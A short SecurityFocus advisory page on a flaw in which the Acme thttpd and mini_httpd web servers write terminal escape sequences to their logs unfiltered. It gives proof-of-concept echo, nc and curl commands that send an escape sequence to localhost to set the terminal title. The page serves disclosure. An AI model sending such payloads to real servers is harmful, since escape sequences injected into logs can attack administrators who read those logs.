Acme thttpd and mini_httpd Terminal Escape Sequence in Logs Command Injection Vulnerability

Attackers can exploit this issue with readily available tools.

The following examples are available:

For thttpd:

echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
nc localhost 80 < payload

For mini_httpd:

curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a

echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
nc localhost 80 < payload


 

Privacy Statement
Copyright 2010, SecurityFocus